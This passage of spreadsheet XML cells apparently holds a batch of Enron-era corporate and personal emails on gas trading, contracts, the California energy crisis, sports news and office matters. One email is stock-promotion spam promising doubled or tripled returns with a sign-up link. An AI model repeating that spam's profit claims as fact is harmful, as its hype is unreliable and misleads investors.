&gt; At Homecoming 2000, the BETA TENT had the biggest crowd by far.  Stay_x000D_
connected and consider a future homecoming BETA reunion.  It's_x000D_
incredible...forget the 20 years in between...everyone just seems to pick it_x000D_
up right where they left off years ago._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
At Homecoming 2000, the BETA TENT had the biggest crowd by far.  Stay_x000D_
connected and consider a future homecoming BETA reunion.  It's_x000D_
incredible...forget the 20 years in between...everyone just seems to pick it_x000D_
up right where they left off years ago._x000D_
_x000D_
_x000D_
_x000D_
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/_x000D_
_x000D_
_x000D_
_x000D_
At Homecoming 2000, the BETA TENT had the biggest crowd by far.  Stay connected and consider a future homecoming BETA reunion.  It's incredible...forget the 20 years in between...everyone just seems to pick it up right where they left off years ago._x000D_
_x000D_
_x000D_
_x000D_
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 05:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Working with Marathon to develop a PR strategy for December and 1Q01.  Will _x000D_
circulate the plan early this week for comments and buy-in._x000D_
_x000D_
Jeff -- just a note... the energy situation in CA has already escalated into _x000D_
a crisis and is on the front-burner of elected officials, the media, business _x000D_
and the public (so if one of our goals was to create a sense of crisis, it's _x000D_
been taken care of).  We need to take advantage of this heightened awareness _x000D_
with an educational campaign.  It's an opportune time to communicate our _x000D_
messages._x000D_
_x000D_
Let me know what else you need. _x000D_
Thanks!_x000D_
kd</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 03:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Fw: (no subject)</t>
  </si>
  <si>
    <t>how could you vote for gore?  especially if you want to become a teacher.  i _x000D_
am not scared to go to florida, i just haven't done it.  lsu might play _x000D_
florida in the sec championship which would be in dec.  we wont know that for _x000D_
two more weeks.  how else is everything going?  i am just keeping busy with _x000D_
work and partying.  get back to me when you get a chance.</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 09:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Management Announcement</t>
  </si>
  <si>
    <t>Good thing those offices are big up there.  Must be getting crowded.</t>
  </si>
  <si>
    <t>Mon, 14 Jan 2002 07:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Draft Gas Firm EOL GTC No Credit</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Mckay, Jonathan  _x000D_
Sent:	Friday, January 11, 2002 9:42 AM_x000D_
To:	Neal, Scott_x000D_
Subject:	FW: Draft Gas Firm EOL GTC No Credit_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Vickers, Frank  _x000D_
Sent:	Thursday, January 10, 2002 1:24 PM_x000D_
To:	Mckay, Jonathan_x000D_
Subject:	FW: Draft Gas Firm EOL GTC No Credit_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cook, Mary  _x000D_
Sent:	Thursday, January 10, 2002 1:07 PM_x000D_
To:	Hodge, Jeffrey T.; Van Hooser, Steve; Vickers, Frank; Bradford, William S.; St. Clair, Carol_x000D_
Subject:	Draft Gas Firm EOL GTC No Credit_x000D_
Importance:	High_x000D_
_x000D_
See attached for your review and comment to me by end of day (or sooner if possible).  Soon to follow, firm eol with credit.  And the same two firms for over the counter, not eol._x000D_
 _x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas 77002-7361_x000D_
(713) 345-7732_x000D_
(713) 646-3393 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Mon, 10 Sep 2001 07:03:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.armstrong@enron.com'})</t>
  </si>
  <si>
    <t>TXU Imbalance</t>
  </si>
  <si>
    <t>Daren, I wanted to check with you on the current status of the of TXU Pipeline imbalance for Tenaska IV.  I noticed on the July statement I just received that the imbalance was at 125,374 MMBTU.  I am not sure if you have been told, but Enron recently entered into a sale agreement with El Paso to sale our interests in this plant by the end of September.  Talking with Rick Hill, he did not want to have a large imbalance liability with the pipeline at the end of September.  Do you think this imbalance will be significantly resolved by the end of the month?  You can call me at 3-7280 if you have any questions.  Thanks._x000D_
_x000D_
James</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 01:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: December Gas</t>
  </si>
  <si>
    <t xml:space="preserve">Jane, I still have two discrepancies with Southwest Gas which I need your _x000D_
help in resolving._x000D_
_x000D_
1.  SWG says price on Sitara 518455 Day 7 should be $9.50 instead of $9.55 - _x000D_
You have already confirmed with me that the price should be $9.55.  I _x000D_
forwarded your email to my contact at SWG and she responded with the email _x000D_
below.  Could you please call SWG trader Mark Anderson so that this can be _x000D_
resolved?_x000D_
_x000D_
2.  On Sitara 386140 SWG says trigger is calculated on physical, not _x000D_
scheduled, volume - You have already confirmed with me that the trigger is _x000D_
based on scheduled volume and that you feel SWG will not agree.  According to _x000D_
my contact at SWG, their trader Bill Brown confirmed with her that the _x000D_
trigger is based on physical volume.  Can you please call Bill so that this _x000D_
discrepancy can be resolved?_x000D_
_x000D_
I appreciate your help in resolving these issues.  Although I have already _x000D_
forwarded your responses to Nancy at SWG, she is being very insistent that _x000D_
SWG is correct and is requesting that the traders resolve these issues._x000D_
_x000D_
Thanks again_x000D_
Laurie_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Laurie Ellis/NA/Enron on 01/30/2001 09:02 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Laurie Ellis_x000D_
01/25/2001 11:07 AM_x000D_
To: Jane M Tholt/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: December Gas_x000D_
_x000D_
Jane, per SWG's email below, can you please call Mark Anderson to resolve the _x000D_
price discrepancy I questioned (SWG says the price on Sitara 518455, Day 7, _x000D_
should be $9.50 instead of $9.55)._x000D_
---------------------- Forwarded by Laurie Ellis/NA/Enron on 01/25/2001 10:57 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Nancy Frazier" &lt;Nancy.Frazier@groupwise.swgas.com&gt; on 01/25/2001 10:53:52 AM_x000D_
To: &lt;Laurie.Ellis@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Re: December Gas_x000D_
_x000D_
_x000D_
Please have her contact Mark Anderson our trader.  He assured me it was _x000D_
$9.50.  I'm sure she has his #.  It's up to them to resolve this.  Nancy_x000D_
</t>
  </si>
  <si>
    <t>Sun, 25 Nov 2001 06:29:30 -0800 (PST)</t>
  </si>
  <si>
    <t>FLASH ALERT: Don't fall for Technology's biggest LIE...</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Investor,_x000D_
_x000D_
I'm writing to expose the biggest lie in technology_x000D_
today..._x000D_
_x000D_
...one that has individual investors completely in the_x000D_
dark about an opportunity of immense proportions.  A_x000D_
LOW-RISK tech stock that can easily DOUBLE your money_x000D_
by this time next year -- then make your fortune_x000D_
several times over in the years to come._x000D_
_x000D_
I've just put the finishing touches on an Urgent_x000D_
Profit Bulletin detailing this opportunity_x000D_
and in just a bit, I'll tell you how to get your_x000D_
FREE copy._x000D_
_x000D_
But first, back to technology's biggest lie.  I'm_x000D_
talking about the so-called "glut" of fiber optic_x000D_
cable.  Here's the REAL story:_x000D_
_x000D_
WHEN the World Trade Center got hit, the Internet_x000D_
slowed down -- very noticeably slowed down.  In fact,_x000D_
it nearly came to a grinding halt!  That means there_x000D_
isn't nearly enough capacity or redundancy built into_x000D_
the system to accommodate a blip in demand._x000D_
_x000D_
Sources tell me that the government is very worried_x000D_
about this problem.  After all, this is the second_x000D_
time it's happened.  Back in July, a tunnel fire in_x000D_
Baltimore slowed the Internet to a crawl for two full_x000D_
days._x000D_
_x000D_
That means our communications systems -- and therefore_x000D_
our economy -- are very, very vulnerable._x000D_
_x000D_
Ten years ago, it wouldn't have mattered.  But today,_x000D_
commerce and security is COMPLETELY DEPENDENT on those_x000D_
systems.  Virtually nothing moves without it.  That's_x000D_
how banks and brokerages transfer funds...how_x000D_
dispatchers route fleets of trucks...how many Americans_x000D_
get paid through direct deposit._x000D_
_x000D_
And we are closer to the BREAKING POINT than 99.9% of_x000D_
Americans even begin to understand.  Here's one_x000D_
example._x000D_
_x000D_
Qwest -- one of America's biggest carriers -- recently_x000D_
said they're 60% loaded on their network.  That_x000D_
doesn't sound too bad...until you understand how these_x000D_
networks operate.  You can't load a network much past_x000D_
65%.  In fact, 70% is virtually CATASTROPHIC --_x000D_
because the network spends so much time searching for_x000D_
open channels, it doesn't spend any time actually_x000D_
sending packets of information._x000D_
_x000D_
The system locks.  Communications stops.  The nation_x000D_
comes to a standstill._x000D_
_x000D_
AMERICA IS FALLING BEHIND the rest of the developed_x000D_
world.  Internet traffic systems currently run faster_x000D_
in Australia, Europe and even South America.  That's_x000D_
because we push out more data than everyone else --_x000D_
but we're not increasing capacity at anywhere near the_x000D_
needed rate._x000D_
_x000D_
We've got to catch up -- and we've got to catch up_x000D_
fast!  Otherwise business, the economy and our_x000D_
national security all go in the CRAPPER._x000D_
_x000D_
BUT WHY do we have this capacity problem amidst a_x000D_
"fiber glut?"  Because  95% of all the fiber that has_x000D_
ever been laid is "dark" -- that is, it's not_x000D_
activated.  And the company I'm recommending is the #1_x000D_
supplier of the components needed to do the job.  I'm_x000D_
looking at a DOUBLE -- possibly a TRIPLE by this time_x000D_
next year.  And I fully expect to multiply our money_x000D_
five-times over by 2007.  In fact, this stock truly_x000D_
has "ten-bagger" potential!_x000D_
_x000D_
At the height of the boom, this company's stock was_x000D_
nearly 20-times higher.  So what changed?  Spending on_x000D_
communications networks dried up.  Now the government_x000D_
is ready to pump $100 billion in emergency spending_x000D_
into the economy; interest rates are practically zero;_x000D_
and the need isn't just vital for the economy anymore_x000D_
-- it's a question of NATIONAL SECURITY!_x000D_
_x000D_
Please don't miss out.  You'll kick yourself big-time_x000D_
if you miss out. Get this company's name -- and full_x000D_
details -- in my urgent profit bulletin: 5-Times_x000D_
Richer By 2007.  It's yours FREE, simply for accepting_x000D_
a 100% RISK-FREE trial subscription to my TECHNOLOGY_x000D_
INVESTING advisory._x000D_
_x000D_
TAKE a full six months to measure the value of my_x000D_
advice for yourself.  Don't like what you see...don't_x000D_
make the profits you want, just cancel, and your_x000D_
subscription doesn't cost you a dime.   That's reason_x000D_
enough to give it a try.  Because if I'm right -- and_x000D_
I'm staking my reputation and my own money on this_x000D_
call -- you can double your money, at least, in 12_x000D_
months...and make your fortune several times over in the_x000D_
coming years._x000D_
_x000D_
Please don't miss out.  Give yourself a chance.  At_x000D_
least take a look at TECHNOLOGY INVESTING to see what_x000D_
you think.  Our unusual six-month guarantee of total_x000D_
satisfaction means my advisory costs you nothing if_x000D_
you don't 100% approve._x000D_
_x000D_
Please click here to sign up now:_x000D_
http://www.ppi-orders.com/index.htm?promo_code=0VN181_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Michael Murphy_x000D_
TECHNOLOGY INVESTING_x000D_
_x000D_
P.S.  The longer you wait, the more profits you MISS_x000D_
OUT on.  This stock has a long ways to run -- but it's_x000D_
already UP 43% since October 1st, in recognition of_x000D_
this company's vital new role in national security._x000D_
_x000D_
Dark fiber does no good.  Actual carrying capacity is_x000D_
strained to the limits.  And get this -- data traffic is_x000D_
DOUBLING every year now.  That means a network_x000D_
running at 63% of capacity needs to double its load by_x000D_
this time next year just to keep up.  That's why the_x000D_
fiber must be lit.  That's why the fiber will be lit._x000D_
Click here to take advantage of this opportunity now._x000D_
http://www.ppi-orders.com/index.htm?promo_code=0VN181_x000D_
_x000D_
------------------------------------------------------_x000D_
_x000D_
ACCOUNT MANAGEMENT_x000D_
_x000D_
We hope this free digest of investing advice is_x000D_
valuable to you. If you'd like to change your e-mail_x000D_
address (DBAUGHM@ECT.ENRON.COM), or unsubscribe, please_x000D_
do so by going to the following address:_x000D_
_x000D_
http://www.investorplace.com/unsubscribe.php_x000D_
_x000D_
------------------------------------------------------_x000D_
_x000D_
Sunday Nov 25, 2001 09:29:29_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Mar 2000 01:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'twyla_s_strogen@cngt.cng.com'})</t>
  </si>
  <si>
    <t>Re: Spring Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.  I will not be able to attend because I'm dislocated my ankle and I'm _x000D_
crutchin it now._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Twyla_S_Strogen@CNGT.CNG.COM on 03/03/2000 12:17:47 PM_x000D_
To: Customer_Advisory_Board@CNG.COM_x000D_
cc:  (bcc: Chris Germany/HOU/ECT)_x000D_
Subject: Spring Meeting_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hello all - sorry for the delay in the agenda.  We've had some discussions _x000D_
here_x000D_
about what to include and it has changed several times!!!_x000D_
_x000D_
I will attach it and also cut/past it to the end of this e-mail.  I have _x000D_
already_x000D_
heard from some of you - but if you have not, please let me know if_x000D_
you will be able to attend.  Thanks!!  I'm looking forward to seeing everyone._x000D_
_x000D_
_x000D_
Twyla_x000D_
_x000D_
(See attached file: Board Agenda 3-00.lwp)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                        E-SCRIPT Customer Advisory Board_x000D_
_x000D_
                                     AGENDA_x000D_
_x000D_
                                 March 21, 2000_x000D_
_x000D_
                                 Pittsburgh, PA_x000D_
_x000D_
_x000D_
_x000D_
     I.   E-SCRIPT Capacity Release Web Update_x000D_
_x000D_
     II.  E-SCRIPT Changes_x000D_
_x000D_
          a.   Changes in reservation billing_x000D_
_x000D_
          b.   Daily Volumes Tab_x000D_
_x000D_
     III. Order 637_x000D_
_x000D_
     IV.  Delivery Point Operator_x000D_
_x000D_
     V.   Customer Access to Pool Imbalance Reports_x000D_
_x000D_
     VI.  New Organization_x000D_
_x000D_
     VII. Open Discussion - Issues, Problems, etc._x000D_
_x000D_
_x000D_
_x000D_
     Lunch will be provided.  Attire is business casual._x000D_
_x000D_
     Please call Twyla Strogen at 304-623-8581 with_x000D_
_x000D_
     questions._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Board Agenda 3-00.lwp_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 13:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rcavanagh@nrdc.org'})</t>
  </si>
  <si>
    <t>frozenset({'wmuseler@nyiso.com', 'mhayes1@starpower.net', 'elizabeth.moler@exeloncorp.com', 'skean@enron.com', 'eric@ef.org', 'wknewman@sourthernco.com', 'res1@cornell.edu', 'commr.massey@ferc.fed.us', 'tblack@igc.org', 'fl_dep@dep.state.fl.us', 'stierney@lexecon.com', 'hal@ef.org', 'rapcowart@aol.com', 'pat.wood@puc.state.tx.us', 'peter@cramton.umd.edu', 'john.w.rowe@exeloncorp.com', 'judi.johansen@pacificorp.com', 'hogan.kathleen@epa.gov', 'msmith@puc.state.id.us', 'wkeese@energy.state.ca.us', 'harrispg@pjm.com', 'gvanwelie@iso-ne.com'})</t>
  </si>
  <si>
    <t>follow up</t>
  </si>
  <si>
    <t>At the close of our very productive meeting yesterday, I promised to_x000D_
circulate a brief update on California's electricity demand trends; it_x000D_
appears below as an attachment at the close of a note I circulated_x000D_
within NRDC earlier today, which I thought would be of interest:_x000D_
_x000D_
Today should have been a severe test for the California grid:  we had_x000D_
the third straight day of high temperatures throughout much of the state_x000D_
and the Southwest (weather forecasts earlier in the week had prompted_x000D_
warnings of rolling blackouts).  As I write this at 4 pm on Thursday,_x000D_
average temperatures throughout the entire PG&amp;E system are above 90_x000D_
degrees.  But peak loads for the day will not reach 40,000 Megawatts,_x000D_
and reserve margins are comfortable (about 15% at the peak hour)._x000D_
California's last rolling blackouts occurred six weeks ago (and those_x000D_
were very modest in scale).  It is far too soon to declare victory, but_x000D_
these are hopeful signs, and they will help relieve pressure on the_x000D_
Governor to crank up dirty emergency generators.  NRDC's updated_x000D_
assessment of recent CA electricity consumption trends (attached again_x000D_
just in case you've lost it) indicates that demand reductions clearly_x000D_
are a big part of the reason why things are looking up.  There are_x000D_
plenty of reasons for continued caution:  the entire West can get much_x000D_
hotter, hydropower conditions in the Northwest remain awful,  and_x000D_
complacency could shift demand back up quickly (much of the recent load_x000D_
reductions represent reversible voluntary actions)._x000D_
_x000D_
You can track the daily drama in detail at_x000D_
http://www.caiso.com/outlook.html._x000D_
_x000D_
 - californiaconsumptiontrendsrevised.doc</t>
  </si>
  <si>
    <t>Fri, 20 Oct 2000 12:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lfried@uclink4.berkeley.edu'})</t>
  </si>
  <si>
    <t>frozenset({'rob.gramlich@neg.pge.com', 'jeff.dasovich@enron.com', 'borenste@haas.berkeley.edu', 'shapiro@haas.berkeley.edu', 'amosher@appanet.org', 'hcameron@uclink.berkeley.edu', 'whederman@columbiaenergygroup.com', 'lfried@uclink.berkeley.edu'})</t>
  </si>
  <si>
    <t>RE: Electricity Summit website</t>
  </si>
  <si>
    <t>This draft has some formatting improvements, but it does not yet incorporate_x000D_
some of the comments that we made earlier. Heather will make these as soon_x000D_
as possible and before the public release(e.g. I sent her specific changes_x000D_
to incorporate Severin's restructuring comments)._x000D_
_x000D_
Lee_x000D_
_x000D_
-----Original Message-----_x000D_
From: Heather Cameron [mailto:hcameron@uclink.berkeley.edu]_x000D_
Sent: Friday, October 20, 2000 5:31 PM_x000D_
To: Rob.Gramlich@neg.pge.com; lfried@uclink.berkeley.edu;_x000D_
borenste@haas.berkeley.edu; shapiro@haas.berkeley.edu;_x000D_
AMosher@appanet.org; whederman@columbiaenergygroup.com;_x000D_
jeff.dasovich@enron.com_x000D_
Subject: Electricity Summit website_x000D_
_x000D_
_x000D_
Dear Colleagues,_x000D_
_x000D_
The new draft website is at:_x000D_
http://gspp.berkeley.edu/events/electricity_summit_conference.htm._x000D_
Have a good weekend. Talk to you on Monday._x000D_
_x000D_
Best wishes,_x000D_
Heather</t>
  </si>
  <si>
    <t>Mon, 12 Nov 2001 09:00:40 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Game Wed</t>
  </si>
  <si>
    <t>In_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hull, Bryan  _x000D_
Sent:	Monday, November 12, 2001 11:00 AM_x000D_
To:	Bass, Eric; Baumbach, David; Blanchard, Timothy; Hiemstra, Nick; Love, Phillip M.; Mathews, Reagan; Winfree, O'Neal D._x000D_
Subject:	Game Wed_x000D_
_x000D_
Our game is at 7. Let me know if you're in.</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 00:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>True Orange Fax/E-Mail #100</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David M Gagliardi/TTG/HouInd on_x000D_
10/24/2000 07:53 AM ---------------------------_x000D_
_x000D_
_x000D_
mggagliardi@duke-energy.com on 10/24/2000 07:27:09 AM_x000D_
_x000D_
To:   DGagliardi@reliantenergy.com, David_Ricks@GSDM.com,_x000D_
Tony.A.Rogers@fritolay.com_x000D_
cc:_x000D_
_x000D_
Subject:  True Orange Fax/E-Mail #100_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Michael_x000D_
Gagliardi/Hou-ComOps/EnergyTrading/PEC on 10/24/2000 07:39 AM_x000D_
---------------------------_x000D_
_x000D_
_x000D_
TruOrange@aol.com on 10/23/2000 08:09:21 PM_x000D_
_x000D_
To:   TruOrange@aol.com_x000D_
cc:_x000D_
Subject:  True Orange Fax/E-Mail #100_x000D_
_x000D_
_x000D_
True Orange Fax/E-Mail Service_x000D_
Volume 8, Fax/E-Mail #100, Monday, October 23, 2000_x000D_
Jerry Scarbrough's True Orange, P. O. Box 26530, Austin, Texas 78755 -_x000D_
Phone_x000D_
512-795-8536_x000D_
_x000D_
Brown Says Injuries Piling Up, UT-Tech on Fox TV at 6 p.m._x000D_
_x000D_
The Longhorns are a 41-point favorite over Baylor in their 11:30 a.m._x000D_
Saturday game in Austin. It will be televised by Fox Syndication._x000D_
Coach Mack Brown said the Longhorns' injuries are piling up at certain_x000D_
positions and he said some players will be cross-trained to improve the_x000D_
depth_x000D_
at those positions._x000D_
Sophomore TE Bo Scaife, the projected starter, suffered a season-ending_x000D_
knee_x000D_
injury during pre-season practice, and junior TE Mike Jones took a lick on_x000D_
the knee against Missouri that will keep him out of action indefinitely._x000D_
That leaves true freshman Brock Edwards and walk-on Cullen Loeffler as the_x000D_
only able-bodied tight ends on the team. Brown said Edwards will start_x000D_
Saturday, and he said FB Chad Stephens, a former TE, will be cross-trained_x000D_
so_x000D_
he can fill in at both positions. TB Ivan Williams also will be_x000D_
cross-trained_x000D_
at fullback, he said._x000D_
He also said OT Robbie Doane has been moved to guard because Antwan_x000D_
Kirk-Hughes' shoulder injury is limiting his playing time. He said the_x000D_
Longhorns had to play starting OTs Leonard Davis and Mike Williams late in_x000D_
the Missouri game "because they were the only healthy tackles we had." He_x000D_
also said redshirt freshman OG Tillman Holloway "played his best game_x000D_
Saturday. He played 53 snaps and did a good job."_x000D_
Brown said DT's Shaun Rogers (ankle) and Marcus Tubbs (shoulder) also are_x000D_
ailing, and he said he hopes both of them can play Saturday. He said_x000D_
freshman_x000D_
Adam Doiron might have to give up his redshirt year unless both of them are_x000D_
able to play._x000D_
On the plus side, Brown said QB Major Applewhite is getting better each_x000D_
week._x000D_
"He came into this year with a hurt knee and he didn't have a lot of_x000D_
confidence in the knee," Brown said, "but he looked like the old Major_x000D_
(against Missouri) for the first time" since he was injured in the Cotton_x000D_
Bowl game against Arkansas._x000D_
Brown also said freshman WR Sloan Thomas, who caught two touchdown passes_x000D_
Saturday in his first extended action, "is going to be a really good_x000D_
player._x000D_
He's been making plays like that in practice, so we decided to play him_x000D_
more." Brown said redshirt freshman WR Artie Ellis is out with a sore shin_x000D_
and he doesn't know when he will return. Ellis also was hampered during his_x000D_
redshirt year with a stress fracture in his shin, and it isn't good news_x000D_
that_x000D_
the same shin is sore again._x000D_
Asked how he can get his team ready to play a Baylor team that has been_x000D_
shut_x000D_
out in its last three games, Brown said, "We need to worry more about us_x000D_
than_x000D_
our opponents. We just need to be a better football team. We have to get_x000D_
ourselves ready, and this is a team that hasn't always done that."_x000D_
The Longhorns can beat Baylor even if they aren't fired up, but the road_x000D_
gets_x000D_
much tougher the following two weeks with road trips to Texas Tech and_x000D_
Kansas. Fox TV has picked the Texas-Texas Tech game for its 6 p.m. national_x000D_
telecast on Nov. 4._x000D_
* * * *_x000D_
FOOTBALL RECRUITING  NOTES: Super DT Tommie Harris of Killeen Ellison said_x000D_
he_x000D_
came to the Missouri game Saturday, but got there late and didn't get to_x000D_
visit with the other recruits. Harris said he had a good time and said_x000D_
Texas_x000D_
remains one of his top choices. . . Fullback James Buchanon of Sarasota,_x000D_
Fla., says he will announce his college choice Tuesday afternoon at 1:30_x000D_
p.m._x000D_
He has been considering FSU, Texas and Boston College, but he took a visit_x000D_
to_x000D_
FSU last weekend and said he had a great time, so the Seminoles think they_x000D_
have him._x000D_
* * * *_x000D_
BASKETBALL RECRUITING  NOTES: Two walk-ons, including a former scholarship_x000D_
player at North Texas State, have been added to the UT basketball team,_x000D_
coach_x000D_
Rick Barnes announced Monday. They are  6-6 junior guard/forward Deginald_x000D_
Erskin and 6-1 freshman point guard Drew Gressett. Erskin, a cousin of_x000D_
former_x000D_
Longhorn Kris Clack, is from Gonzales. He played at North Texas State for_x000D_
two_x000D_
years, averaging 12.3 points as a freshman and 18.9 points as a sophomore._x000D_
He_x000D_
will have to sit out this year, but can practice with the team. Gressett_x000D_
was_x000D_
an All-District guard at Austin Westlake last season, averaging 15 points_x000D_
and_x000D_
6 assists per game._x000D_
* * * *_x000D_
My next e-mail/fax will be whenever events warrant._x000D_
* * * *_x000D_
The True Orange Fax Service includes  at  least  99 faxes  a year and costs_x000D_
$99 ($79 by E-Mail). The True Orange Newsletter includes  26 newsletters_x000D_
and_x000D_
is published weekly during football season and twice monthly during most of_x000D_
the other months. It costs $45. Save by subscribing to both for $130 (or_x000D_
$110_x000D_
if you take the faxes via E-Mail  or $99 if you take the faxes and_x000D_
newsletter_x000D_
via E-Mail). Send check  to address at the top of page. I also  update my_x000D_
900 number ? 1-900-288-8839 ? daily with recruiting news. My E-Mail address_x000D_
is: truorange@aol.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 10:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mwilliams@tradespark.com'})</t>
  </si>
  <si>
    <t>BETA &amp; Fee Agreement -TradeSpark, L.P.</t>
  </si>
  <si>
    <t xml:space="preserve">At the request of Dan Diamond, I am attaching our proposed form of Broker _x000D_
Electronic Transaction Agreement and Fee Agreement.   If the enclosed meets _x000D_
with your approval, please execute the agreements and return them to me via _x000D_
fax no. (713) 646-3490.  I will then have them executed by Enron.  If you _x000D_
have any comments or questions please call Mark Greenberg, Senior Counsel, at _x000D_
(713) 345-8897 or me at (713) 853-3399.  We look forward to hearing from you._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 05:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>John,_x000D_
There is a re-launch of the Coast chair at the Milan Fair. It is by Magis._x000D_
This version is plastic blow-moulded ( not the original wood chair for the_x000D_
Coast Restaurant)_x000D_
_x000D_
Some of the originals recently came up for auction._x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
Patsy Youngstein_x000D_
For Marc Newson Ltd_x000D_
_x000D_
+44 0207 287 9388 T_x000D_
+44 0207 287 9347 F_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: John.Griffith@enron.com [mailto:John.Griffith@enron.com]_x000D_
Sent: 05 March 2001 21:38_x000D_
To: Patsy Youngstein_x000D_
Subject: RE: Coast chair_x000D_
_x000D_
_x000D_
_x000D_
Patsy,_x000D_
_x000D_
I just talked to Totemdesign and they said that Magis doesn't produce the_x000D_
Coast chair.  He thought that it was only produced for a restaurant, is_x000D_
that true?  If not, who produces the Coast chair._x000D_
_x000D_
Thanks for your time._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
John Griffith</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 08:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Gilmer Rental Tower</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Cheryl Marshall/HOU/ECT on 03/29/2001 _x000D_
04:36 PM ---------------------------_x000D_
_x000D_
_x000D_
Bill Linnehan@ENRON_x000D_
03/28/2001 02:47 PM_x000D_
To: Randy Hotz/HPL/Enron@ENRON, Ron Green/HPL/Enron@Enron, Kevin _x000D_
Dumas/GCO/Enron@ENRON, Bill Sheridan/HPL/Enron@ENRON, Steve HPL _x000D_
Schneider/HOU/ECT@ECT, Cheryl Marshall/HOU/ECT@ECT, Pat _x000D_
Flavin/GCO/Enron@ENRON, pcolsman@hanovermeasurement.com_x000D_
cc:  _x000D_
Subject: Gilmer Rental Tower_x000D_
_x000D_
Yesterday, March 27 , 2001 , Aaron Ortiz visited Gilmer Tower to perform _x000D_
required test and checks on the VHF Radio System at said tower. The equipment _x000D_
tested good , but the following discrepancies were noted about the rental _x000D_
tower site at Gilmer._x000D_
_x000D_
1. There was no FAA registration number posted on the tower._x000D_
2. Tower lights were found to be non functional, as well as either side _x000D_
lights or the beacon on top the tower. Also observed red side light lenses _x000D_
not covering the  fixtures, but were hanging by their safety chain. Circuit _x000D_
breakers were checked, none appeared to be inactive and apparently the tower _x000D_
light controller has failed or the bulbs are burned out._x000D_
3. There was no evidence of any equipment at the tower which would allow _x000D_
remote monitoring of the tower lights._x000D_
_x000D_
In view of these discrepancies I immediately contacted Ron Green and James _x000D_
McKay and the decision was made to remove HPL radio equipment,  license, and _x000D_
log book from the location. A tower crew is scheduled to remove the coax &amp; _x000D_
antenna next week. _x000D_
_x000D_
Recommendations are:_x000D_
_x000D_
1. Cancel the license immediately._x000D_
2. Send a certified register letter to the tower owner stating reasons for _x000D_
removing equipment._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
7 antenna next week_x000D_
</t>
  </si>
  <si>
    <t>Sun, 11 Feb 2001 23:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.burns@enron.com', 'jennifer.fraser@enron.com'})</t>
  </si>
  <si>
    <t>Jennifer B. please print, Jen F. please get this on the fundy's page....Jeff_x000D_
----- Forwarded by Jeffrey A Shankman/HOU/ECT on 02/12/2001 07:50 AM -----_x000D_
_x000D_
	Chris Connelly_x000D_
	02/11/2001 02:44 PM_x000D_
		 _x000D_
